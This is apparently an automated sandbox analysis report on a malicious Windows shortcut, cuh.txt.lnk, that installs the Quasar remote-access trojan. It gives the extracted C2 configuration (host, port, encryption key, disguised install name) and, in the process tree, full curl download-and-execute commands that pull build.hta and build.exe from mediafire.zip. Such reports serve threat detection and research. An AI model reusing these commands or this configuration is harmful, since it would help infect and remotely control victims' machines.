Analysis
-
max time kernel
68s -
max time network
73s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
08-06-2024 21:46
Static task
static1
Behavioral task
behavioral1
Sample
cuh.txt.lnk
Resource
win7-20240220-en
General
-
Target
cuh.txt.lnk
-
Size
1KB
-
MD5
3947296e1f311ad2bd25bb986e9d4622
-
SHA1
57c1f9b221a150919dc23ce6f10ed5b8f74fbd12
-
SHA256
6f8196f6de261c3b0d45e9b847ae3cf706d99732778a7f86b954ea23e3dd342b
-
SHA512
24f5432807bbb1f867765738ddd3c391882a4fd49f19c9d34339f995de3bd07db8ec8ae0df7283e7e670d93c599b89c87ff64f0208a10d52412ab6407715fde1
Malware Config
Extracted
quasar
1.3.0.0
new
roblox.airdns.org:62604
QSR_MUTEX_DT5aFgoH5h6bbtKq7Q
-
encryption_key
J5Eb7dBhM8i5671jmkSJ
-
install_name
Runtime Broker.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Runtime Broker
-
subdirectory
SubDir
Signatures
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/3828-8-0x0000000000D90000-0x0000000000DEE000-memory.dmp family_quasar -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.execmd.exemshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation mshta.exe -
Executes dropped EXE 1 IoCs
Processes:
build.exepid process 3092 build.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 32 ip-api.com -
Drops file in System32 directory 1 IoCs
Processes:
curl.exedescription ioc process File created C:\Windows\SysWOW64\build.exe curl.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
build.exedescription pid process target process PID 3092 set thread context of 3828 3092 build.exe csc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 1 IoCs
Processes:
cmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000_Classes\Local Settings cmd.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
msedge.exemsedge.exeidentity_helper.exepid process 548 msedge.exe 548 msedge.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe 3104 identity_helper.exe 3104 identity_helper.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
Processes:
msedge.exepid process 752 msedge.exe 752 msedge.exe 752 msedge.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
csc.exedescription pid process Token: SeDebugPrivilege 3828 csc.exe -
Suspicious use of FindShellTrayWindow 26 IoCs
Processes:
msedge.exepid process 752 msedge.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
Processes:
msedge.exepid process 752 msedge.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe 752 msedge.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
csc.exepid process 3828 csc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.execmd.exemshta.execmd.exebuild.execsc.exemsedge.exedescription pid process target process PID 5052 wrote to memory of 4788 5052 cmd.exe cmd.exe PID 5052 wrote to memory of 4788 5052 cmd.exe cmd.exe PID 4788 wrote to memory of 3468 4788 cmd.exe curl.exe PID 4788 wrote to memory of 3468 4788 cmd.exe curl.exe PID 4788 wrote to memory of 4244 4788 cmd.exe mshta.exe PID 4788 wrote to memory of 4244 4788 cmd.exe mshta.exe PID 4788 wrote to memory of 4244 4788 cmd.exe mshta.exe PID 4244 wrote to memory of 5080 4244 mshta.exe cmd.exe PID 4244 wrote to memory of 5080 4244 mshta.exe cmd.exe PID 4244 wrote to memory of 5080 4244 mshta.exe cmd.exe PID 5080 wrote to memory of 1608 5080 cmd.exe curl.exe PID 5080 wrote to memory of 1608 5080 cmd.exe curl.exe PID 5080 wrote to memory of 1608 5080 cmd.exe curl.exe PID 5080 wrote to memory of 3092 5080 cmd.exe build.exe PID 5080 wrote to memory of 3092 5080 cmd.exe build.exe PID 5080 wrote to memory of 3092 5080 cmd.exe build.exe PID 3092 wrote to memory of 3828 3092 build.exe csc.exe PID 3092 wrote to memory of 3828 3092 build.exe csc.exe PID 3092 wrote to memory of 3828 3092 build.exe csc.exe PID 3092 wrote to memory of 3828 3092 build.exe csc.exe PID 3092 wrote to memory of 3828 3092 build.exe csc.exe PID 3828 wrote to memory of 752 3828 csc.exe msedge.exe PID 3828 wrote to memory of 752 3828 csc.exe msedge.exe PID 752 wrote to memory of 3604 752 msedge.exe msedge.exe PID 752 wrote to memory of 3604 752 msedge.exe msedge.exe PID 752 wrote to memory of 428 752 msedge.exe msedge.exe PID 752 wrote to memory of 428 752 msedge.exe msedge.exe PID 752 wrote to memory of 428 752 msedge.exe msedge.exe PID 752 wrote to memory of 428 752 msedge.exe msedge.exe PID 752 wrote to memory of 428 752 msedge.exe msedge.exe PID 752 wrote to memory of 428 752 msedge.exe msedge.exe PID 752 wrote to memory of 428 752 msedge.exe msedge.exe PID 752 wrote to memory of 428 752 msedge.exe msedge.exe PID 752 wrote to memory of 428 752 msedge.exe msedge.exe PID 752 wrote to memory of 428 752 msedge.exe msedge.exe PID 752 wrote to memory of 428 752 msedge.exe msedge.exe PID 752 wrote to memory of 428 752 msedge.exe msedge.exe PID 752 wrote to memory of 428 752 msedge.exe msedge.exe PID 752 wrote to memory of 428 752 msedge.exe msedge.exe PID 752 wrote to memory of 428 752 msedge.exe msedge.exe PID 752 wrote to memory of 428 752 msedge.exe msedge.exe PID 752 wrote to memory of 428 752 msedge.exe msedge.exe PID 752 wrote to memory of 428 752 msedge.exe msedge.exe PID 752 wrote to memory of 428 752 msedge.exe msedge.exe PID 752 wrote to memory of 428 752 msedge.exe msedge.exe PID 752 wrote to memory of 428 752 msedge.exe msedge.exe PID 752 wrote to memory of 428 752 msedge.exe msedge.exe PID 752 wrote to memory of 428 752 msedge.exe msedge.exe PID 752 wrote to memory of 428 752 msedge.exe msedge.exe PID 752 wrote to memory of 428 752 msedge.exe msedge.exe PID 752 wrote to memory of 428 752 msedge.exe msedge.exe PID 752 wrote to memory of 428 752 msedge.exe msedge.exe PID 752 wrote to memory of 428 752 msedge.exe msedge.exe PID 752 wrote to memory of 428 752 msedge.exe msedge.exe PID 752 wrote to memory of 428 752 msedge.exe msedge.exe PID 752 wrote to memory of 428 752 msedge.exe msedge.exe PID 752 wrote to memory of 428 752 msedge.exe msedge.exe PID 752 wrote to memory of 428 752 msedge.exe msedge.exe PID 752 wrote to memory of 428 752 msedge.exe msedge.exe PID 752 wrote to memory of 428 752 msedge.exe msedge.exe PID 752 wrote to memory of 428 752 msedge.exe msedge.exe PID 752 wrote to memory of 428 752 msedge.exe msedge.exe PID 752 wrote to memory of 428 752 msedge.exe msedge.exe PID 752 wrote to memory of 428 752 msedge.exe msedge.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\cuh.txt.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c curl -L https://mediafire.zip/build.hta -o "C:\Users\Admin\AppData\Local\Temp\build.hta" && "C:\Users\Admin\AppData\Local\Temp\build.hta"2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\curl.execurl -L https://mediafire.zip/build.hta -o "C:\Users\Admin\AppData\Local\Temp\build.hta"3⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\build.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl -L https://mediafire.zip/build.exe -o build.exe & build.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\curl.execurl -L https://mediafire.zip/build.exe -o build.exe5⤵
- Drops file in System32 directory
-
C:\Windows\SysWOW64\build.exebuild.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"6⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://niggafart.com/7⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc751646f8,0x7ffc75164708,0x7ffc751647188⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2184,11671437008643798134,15755109213579363633,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2192 /prefetch:28⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2184,11671437008643798134,15755109213579363633,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:38⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2184,11671437008643798134,15755109213579363633,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2960 /prefetch:88⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,11671437008643798134,15755109213579363633,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,11671437008643798134,15755109213579363633,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,11671437008643798134,15755109213579363633,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4952 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2184,11671437008643798134,15755109213579363633,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5292 /prefetch:88⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2184,11671437008643798134,15755109213579363633,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5292 /prefetch:88⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5ecdc2754d7d2ae862272153aa9b9ca6e
SHA1c19bed1c6e1c998b9fa93298639ad7961339147d
SHA256a13d791473f836edcab0e93451ce7b7182efbbc54261b2b5644d319e047a00a7
SHA512cd4fb81317d540f8b15f1495a381bb6f0f129b8923a7c06e4b5cf777d2625c30304aee6cc68aa20479e08d84e5030b43fbe93e479602400334dfdd7297f702f2
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD52daa93382bba07cbc40af372d30ec576
SHA1c5e709dc3e2e4df2ff841fbde3e30170e7428a94
SHA2561826d2a57b1938c148bf212a47d947ed1bfb26cfc55868931f843ee438117f30
SHA51265635cb59c81548a9ef8fdb0942331e7f3cd0c30ce1d4dba48aed72dbb27b06511a55d2aeaadfadbbb4b7cb4b2e2772bbabba9603b3f7d9c8b9e4a7fbf3d6b6b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent StateFilesize
470B
MD582832e4391749121a68719f75b09ff36
SHA10916aeaf172b4da979f2b54d01e70c815954b3f6
SHA2564ac032c6433fdcde5fb1304403abe95725573f7618d20099d23fda452700dce0
SHA5125effacab94dfb0ce79f2ee2224e708dc78da459a10725deb25f71b76bddde29ad906513a7f680ea42b6bf57f5fcedeed5637bad9a268b3498bc6395b7e979f5e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD58b0a2ad8b4b89c8aba77ecc2586b396a
SHA19196b30f47f4448b595ce5a5914e4262a260e347
SHA256b9636b19f75180674997adacd854197b7df37d43d2aeca99a85f5e8379a2eef5
SHA51263e1e9e3ee7f9e2f40d370115bcf2b994bcd45276c22507f7640e6a7421c6ee6aac640cfabb24880722fdde39eff438205d13d48a5538ee6e0db8d41ada6cd41
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
5KB
MD5113f76b563956273e91c0d0779c06fc5
SHA134ceb13eeab34fddaa94d56537c6d6f2eb861c44
SHA256a4d8c3e7a654fee44f8657b1416c8c058c42a1cddd4162329ab14126b56a849f
SHA51246baf52acc27bb04db02d5304ffe79a014c1d1c6a01477caf9d7b1b7abcb9c11c750298226814825a49c80b728e7ebd8ee1353241503021d2573738f7a36a44b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
10KB
MD5fdc2123bc2e417071a738d125bcbe80f
SHA106afc3aed571aad6af62a7d6b1d12c125f0139b1
SHA256b6799eae350dc2521ccceb9cfc3777d7191238abbee1fa80d4dd7e31a751053a
SHA512f4974c6d9a470e2e4827607d2f82fd63110347585801f43352eb5e7bf8da5a10ba55f03c63c7ace38851110bec40604a455cbce93887305123e2ded7379c4426
-
C:\Users\Admin\AppData\Local\Temp\build.htaFilesize
178B
MD56316c03f1136af10c1435fbfd9ed3266
SHA172dd8c35ed8d459dbbf511e036d7e671e403c500
SHA256aa2cdaf08dfd772aefdb8989bb52eee87a0784b019278a7101920f46475cb87e
SHA512064d114e20697d32a64dc2f9a2825016cb34edcd4e73aeffe45f768e82c966af439a8563ae28a4f37bad8ecfee3c2627ca032eb8a8b637c599af3e7548a5e406
-
C:\Windows\SysWOW64\build.exeFilesize
3.0MB
MD505eecfc1820ab3273409323601a71f23
SHA15076d5c3a1aa6f2ffcc299f803d0dd01b33d6dd7
SHA2564a72f3948f014c2ded502832814c6d65feb78bd1caef7df8bcecb78f7a90b6e2
SHA51281d10658aaf6d6341b929dcdb1eccd97dd752b7cbe7b497ed85b88a03ea540a2de6b24ae98ace353e861d1ea7ad181449e332dec26b075c4684c7286cc167a00
-
\??\pipe\LOCAL\crashpad_752_QJPUPFLHLAYIJJFJMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/3092-7-0x0000000000400000-0x0000000000704000-memory.dmpFilesize
3.0MB
-
memory/3828-9-0x0000000005EE0000-0x0000000006484000-memory.dmpFilesize
5.6MB
-
memory/3828-15-0x0000000007710000-0x000000000771A000-memory.dmpFilesize
40KB
-
memory/3828-13-0x0000000007180000-0x00000000071BC000-memory.dmpFilesize
240KB
-
memory/3828-12-0x0000000006B40000-0x0000000006B52000-memory.dmpFilesize
72KB
-
memory/3828-11-0x0000000005B30000-0x0000000005B96000-memory.dmpFilesize
408KB
-
memory/3828-10-0x0000000005A90000-0x0000000005B22000-memory.dmpFilesize
584KB
-
memory/3828-8-0x0000000000D90000-0x0000000000DEE000-memory.dmpFilesize
376KB